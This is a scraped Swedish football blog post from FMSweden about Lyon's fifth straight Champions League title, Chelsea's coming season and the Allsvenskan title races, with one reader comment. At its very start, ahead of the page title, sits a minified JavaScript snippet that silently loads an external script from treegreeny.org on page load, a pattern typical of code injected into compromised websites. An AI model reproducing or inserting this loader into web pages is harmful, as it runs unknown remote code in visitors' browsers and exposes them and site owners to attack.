;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Omöjliga Lyon och spännande Chelsea – FMSweden
Meny Stäng

Fabbes blogg: Omöjliga Lyon och spännande Chelsea

Denna veckas blogg fokuserar på damfotboll och söndagens CL-final. Men även om lite andra saker från världsfotbollen.

Kaffe, kaka, femte raka. Fem raka titlar i världens största turnering är smått ofattbart att ta in, men det är faktum för Lyon när man slog Wolfsburg i söndags. Det är dock inte jättemärkligt, då Lyon har världens på pappret bästa fotbollslag. Man kan till exempel stoltsera med engelska landslagets Alex Greenwood som fjärdeval på vänsterbacken, och det är ju en bredd som heter duga. Mot Wolfsburg i söndagens final kändes det aldrig riktigt spännande, trots att det bara blev 2-1. Lyon var hetare, bättre och vann tillslut väldigt rättvist.

Frågan är dock vad som händer nu? För i flertalet år har Lyon varit det givna valet för världens bästa spelare. Men på senare år har som alla vet satsningen ökat hos flera storklubbar, och många klubbar har tagit stora steg på kort tid. Inom kort kommer detta även märkas på den absolut största scenen, och jag är inte alls säker på att Lyon kommer vara ett av finallagen nästa säsong, även om man kommer vara där och slåss om det.

Allra mest nyfiken är jag på Magdalena Erikssons Chelsea. Den engelska storklubben har under flertalet år tagit stora kliv framåt, och kommande säsong talar mycket för att man har ett anfallspar som heter Pernille Harder och Sam Kerr. Två av världens absolut bästa anfallare ihop med ett i övrig väldigt bra och intressant lag, gör att man på allvar ser ut att kunna nå den absoluta toppen. Så grattis på förhand alla Chelsea-supportrar.

————————————

I allsvenskan fick vi se en ”seriefinal” mellan Malmö FF och Elfsborg i söndags. 1-1 på tavlan, och MFF behåller försprånget på sju poäng. Många matcher kvar att spela, men jag har oerhört svårt att se något lag utmana di blåe. Grattis Malmö!

————————————

Även i damallsvenskan ska det mycket till om guldet inte ska hamna i Malmö. FC Rosengård känns klart bäst i serien, och det blir nog dubbelt guldfirande i Skåne under hösten/vintern.

————————————

Det var veckans lite kortare blogg. Har jag missat något att ta upp? Har ni något som ni känner absolut måste diskuteras i nästa blogg? Tveka inte att höra av er. Antingen här på FMSweden eller på Twitter där jag går under namnet @AnderssonFabian.

På återhörande!

Ciao

Please wait...

Liknande Inlägg

2 kommentarer

  1. Micke

    Bra blogg Fabbe! Något jag tänker vore intressant framöver är det s.k. protokollet om hur matcher ska genomföras p.g.a. corona. Nu argumenterade HIF för att skjuta på mötet med DIF, trots att man tidigare kommit överens om något annat. Men var går gränsen för vad som kan accepteras? 13 spelare är tillräckligt just nu vad jag har hört, men det är ju en rejäl avvägning med tanke på att alla lag ska ha liknande förutsättningar. Inte avundsjuk på de som fattar besluten här…

Lämna ett svar